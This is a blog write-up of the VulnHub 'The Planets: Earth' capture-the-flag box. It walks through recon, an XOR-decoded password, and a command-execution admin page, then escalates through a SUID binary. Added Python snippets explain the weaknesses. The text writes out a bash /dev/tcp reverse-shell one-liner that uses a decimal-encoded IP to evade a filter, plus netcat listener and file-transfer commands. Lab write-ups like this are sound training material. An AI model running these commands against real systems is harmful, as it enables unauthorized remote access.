For this writeup, I’ll be going through how I completed VulnHub’s The Planets: Earth box.
Step 1: Nmap Scan
As usual, let’s perform an nmap scan to see what we’re dealing with.
nmap -A -sS -p- -oN ./nmap_scan $BOX
- -A: Aggressive scan. According to man nmap, it enables OS detection, version detection, script scanning, and traceroute.
- -sS: TCP SYN scan (the default “half-open” scanning technique).
- -p-: Scan all ports.
- -oN <file_name>: Write the results in normal format to <file_name> for future reference.
- $BOX: the target box’s IP address.
It seems we have a pretty simple setup with only 3 ports open: 22/ssh, 80/http, and 443/ssl. The scan also dug up some DNS information (hostnames). Let’s deal with that first in the next step.
Step 2: Add to /etc/hosts
I’ll go ahead and add the hostname entries from the nmap scan to /etc/hosts.
Step 3: Visit web pages
Now that we have that done, let’s check all of the sites and see what we can find. Let’s start by looking at port 80.
Mkay, nothing interesting here. Let’s check what’s on port 443.
And now let’s check the two entries we added to /etc/hosts.
Step 4: Robots.txt
Checking each of the previously mentioned pages, you can eventually find an interesting robots.txt.
Trying /testingnotes.* with each of the listed extensions in place of the wildcard, you’ll eventually find /testingnotes.txt.
Step 5: Visit /testingnotes.txt
These seem to be some developer/admin notes left on the server. I went ahead and took note of the terra username for the admin portal. Let’s take a look at testdata.txt.
It seems like this is what was used to encrypt the first few messages we see on the earth.local page. Let’s try to decode the messages on that page using this information.
Step 6: Decode Message(s)
Looking at the messages on earth.local, they look like ASCII text that has been converted to hex. I’m going to detail how to decrypt the bottom message (starting with “2402”) because, **spoiler**, the other messages decrypt to gibberish.
First, we’ll need to convert the contents of testdata.txt to hex. I just used an online hex converter for this.
I then took that hex and used it as the key on another website, pasting the message we want to decrypt into the left box.
I then took the hex result and converted it back to ASCII.
We get earthclimatechangebad4humans as a repeating string. Let’s try using this to log in as terra.
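Here is the Step 6 decode as a small script, added for this writeup rather than taken from it. It assumes the operation behind the online tool is XOR (which is how the Earth box’s notes describe the scheme; the writeup itself only says the hex was used as “the key”). The key and message below are constructed stand-ins, not the real testdata.txt or the real “2402…” message, and the repeating-unit finder makes the “repeating string” observation mechanical.

```python
"""Repeating-key XOR decode as in Step 6 (added example, not from the original writeup)."""
from itertools import cycle


def xor_hex(cipher_hex: str, key_hex: str) -> bytes:
    """XOR hex-encoded ciphertext with a hex-encoded key.

    The key is cycled if it is shorter than the message. In the writeup the key
    (the hex of testdata.txt) is at least as long as the message, so cycling
    never kicks in there; it is handled here so the function works generally.
    """
    cipher = bytes.fromhex(cipher_hex)
    key = bytes.fromhex(key_hex)
    if not key:
        raise ValueError("empty key")
    return bytes(c ^ k for c, k in zip(cipher, cycle(key)))


def shortest_period(text: str) -> str:
    """Return the shortest unit whose repetition reproduces `text`.

    The decoded plaintext in the writeup is one credential written over and
    over, so its period is the credential itself.
    """
    for p in range(1, len(text) + 1):
        unit = text[:p]
        if (unit * (len(text) // p + 1))[: len(text)] == text:
            return unit
    return text


# Constructed sample: NOT the box's real key or message. The real key in the
# writeup is the text of testdata.txt; a made-up sentence stands in for it here.
SAMPLE_KEY = b"a constructed sample key that stands in for testdata.txt and is long enough"
SAMPLE_PLAINTEXT = ("earthclimatechangebad4humans" * 3)[:80]
# Encrypting the sample plaintext produces the hex blob a visitor would see on the page.
SAMPLE_CIPHER_HEX = bytes(
    p ^ k for p, k in zip(SAMPLE_PLAINTEXT.encode(), cycle(SAMPLE_KEY))
).hex()


def decode_sample() -> str:
    """Run the Step 6 procedure end to end on the constructed sample:
    hex message XOR hex key, then bytes back to ASCII."""
    return xor_hex(SAMPLE_CIPHER_HEX, SAMPLE_KEY.hex()).decode()


if __name__ == "__main__":
    plaintext = decode_sample()
    print(plaintext)
    print("repeating unit:", shortest_period(plaintext))
```

Because XOR is its own inverse, the same function both produces the sample ciphertext and undoes it; the only thing a reader of the page had to find was the key material, which the testing notes handed over.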
Step 7: Login as Terra
I realize now that you’re probably wondering how I found the admin page. I forgot to mention previously that I ran gobuster on each of the web pages that we found. In doing that, I found that http://earth.local/admin exists:
Anyway, let’s visit that admin portal and log in using the credentials terra/earthclimatechangebad4humans.
Nice, it works, and the portal turns out to be a conveniently simple web page for executing commands. Naturally, I’ll start by trying to pop a reverse shell.
Well, that’s annoying.
Step 8: Let’s see what we can do (user flag found)
Before proceeding, I dig around the filesystem and eventually stumble across /var/earth_web, which contains the user flag.
Nice, now we just need to get the root flag.
Step 9: Reverse Shell Again
Doing some Google searching, I find out that we can convert the IP to decimal and use bash to pop a reverse shell. This should let us bypass the “Remote connections are forbidden” check, because apparently it only checks whether our input contains an IP address in its usual dotted form. Don’t believe me? Watch what happens when I input only an IP and nothing else:
So anyway, let’s try it using my IP converted to decimal. For this, I just used an online tool to convert my IP.
bash -i >& /dev/tcp/172294500/10000 0>&1
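As an added illustration of why this bypass works (my code, not the box’s server-side check, which the writeup never shows), the snippet below reconstructs a dotted-quad denylist of the kind the writeup infers and shows that the same destination written as a decimal integer slips past it. `decimal_to_dotted` is the inverse of the online converter used above, and `dev_tcp_targets` is a review helper that normalises such input back to dotted form; both regexes are my assumptions for illustration.

```python
"""Why the 'Remote connections are forbidden' filter is bypassable (added example)."""
import re

# Reconstruction of the check the writeup infers: reject anything that contains a
# dotted-quad IPv4 address. The box's actual code is not shown in the writeup.
DOTTED_QUAD = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample inputs modelled on the writeup's two attempts (assumed hosts).
ATTEMPT_DOTTED = "bash -i >& /dev/tcp/10.69.1.100/10000 0>&1"
ATTEMPT_DECIMAL = "bash -i >& /dev/tcp/172294500/10000 0>&1"


def naive_filter_blocks(command: str) -> bool:
    """Return True if a dotted-quad denylist would reject this command."""
    return DOTTED_QUAD.search(command) is not None


def decimal_to_dotted(value: int) -> str:
    """Convert a 32-bit integer to dotted-quad IPv4 notation.

    This is the reverse of the online tool the writeup used, and it is what a
    reviewer needs to see which host a decimal-form address really names.
    """
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit IPv4 address")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def dev_tcp_targets(command: str) -> list:
    """Extract /dev/tcp/<host>/<port> destinations from a command, normalising a
    decimal-integer host back to dotted form so both spellings compare equal."""
    found = []
    for host, _port in re.findall(r"/dev/tcp/([^/\s]+)/(\d+)", command):
        found.append(decimal_to_dotted(int(host)) if host.isdigit() else host)
    return found


if __name__ == "__main__":
    for attempt in (ATTEMPT_DOTTED, ATTEMPT_DECIMAL):
        print(f"blocked={naive_filter_blocks(attempt)!s:5} targets={dev_tcp_targets(attempt)}")
```

Normalising is useful when reviewing captured input after the fact, but the real fix for a page that hands input to a shell is not to do that at all (or to strictly allowlist the few commands it needs): a denylist keyed on how an address is spelled only ever catches the spellings its author thought of.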
Before executing this command, in another terminal I have a listener waiting with the command:
nc -nvlp 10000
Now that our listener is up and running, we’ll go ahead and execute the command from the admin page and catch it with our listener.
Nice, we’re in. I’m just going to go ahead and spawn a TTY shell using python.
Step 10: Check SUIDs
Now that we have access to the system, let’s check for SUID binaries and see if there’s any way we can escalate to root.
find / -perm -4000 2>/dev/null
Hmm, /usr/bin/reset_root looks interesting. Running it produces the following output:
Aw yeah, I think we’re definitely looking in the right place. Let’s pull reset_root back to our box so we can take a closer look at it. We’ll do this with the following commands (the listener on our box needs to be running before the target sends):
On the target box:
nc -w 3 <my_ip> <my_port> < reset_root
On our box:
nc -nvlp <my_port> > reset_root
Step 11: Investigate reset_root
Let’s start by running strings to see if we see anything interesting.
Taking a look at this, I can guess that it is trying to reset the root password based on some triggers. Let’s run ltrace to see what those triggers are. First we need to make the file executable on our box.
chmod +x ./reset_root
and then run ltrace on it
Ah, so it just checks to see if those files exist? Well, let’s go ahead and create those on the target box and then run it again.
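To make the lesson here concrete, below is an added Python example (mine, not the writeup’s or the box’s code) contrasting the existence check that ltrace revealed with a stricter one. The trigger paths are hypothetical placeholders because the writeup does not list the real ones, and the demo creates its files in a temp directory the way an unprivileged user would.

```python
"""Why 'the trigger files exist' is not authorization (added example modelled on Step 11)."""
import os
import stat
import tempfile

# Hypothetical placeholders for the trigger paths ltrace showed in the writeup
# (the writeup does not name them). Under a world-writable directory, any user
# can create them, so their presence says nothing about who created them.
TRIGGER_PATHS = ["/tmp/EXAMPLE_trigger_1", "/tmp/EXAMPLE_trigger_2"]


def triggers_exist(paths) -> bool:
    """The check the writeup infers reset_root makes: mere existence."""
    return all(os.path.exists(p) for p in paths)


def trigger_is_trustworthy(path: str) -> bool:
    """A stricter check: a regular file (not a symlink), owned by root, and not
    writable by group or others. Even this is weak if the parent directory is
    writable by others; the robust design is to not gate a privileged action on
    files in locations unprivileged users can write to at all."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid != 0:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def demo() -> dict:
    """Create the trigger files as an unprivileged user would (touch them in a
    temp dir, left world-writable) and compare what the two checks conclude."""
    with tempfile.TemporaryDirectory() as d:
        paths = [os.path.join(d, f"trigger_{i}") for i in range(2)]
        for p in paths:
            with open(p, "w"):
                pass
            os.chmod(p, 0o666)  # world-writable, as a careless touch might leave it
        return {
            "exists": triggers_exist(paths),
            "trusted": all(trigger_is_trustworthy(p) for p in paths),
        }


if __name__ == "__main__":
    print(demo())
```

The existence check says “go ahead” for files anyone could have dropped in place; the stricter check refuses them. The writeup’s privilege escalation is exactly the gap between those two answers.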
Nice, now let’s switch to root.
And now grab the root flag from root’s home directory.
Overall, this was a pretty fun easy-level box to knock out. If you found other ways of cracking this box, definitely let me know below in the comments!
As always, if you enjoyed this post please consider checking out my other posts here on WordPress:
- Data Structure: Linked List with Python
- VulnHub: Jangow 1.0.1 Writeup
- Hosting a Website with Github Pages
- Creating a Python Bot with Selenium
- Hack The Box: Impossible Password Reverse Engineering Challenge
- Asynchronous Server/Client with Python
Feel free to also follow me via my other social media accounts: Instagram, Twitter, Facebook, and Medium!
As always, if you liked what you read and you’d like to support me, please consider buying me some coffee! Every cup of coffee sent my way helps me stay awake after my full-time job so that I can produce more high quality blog posts! Any and all support would be greatly appreciated!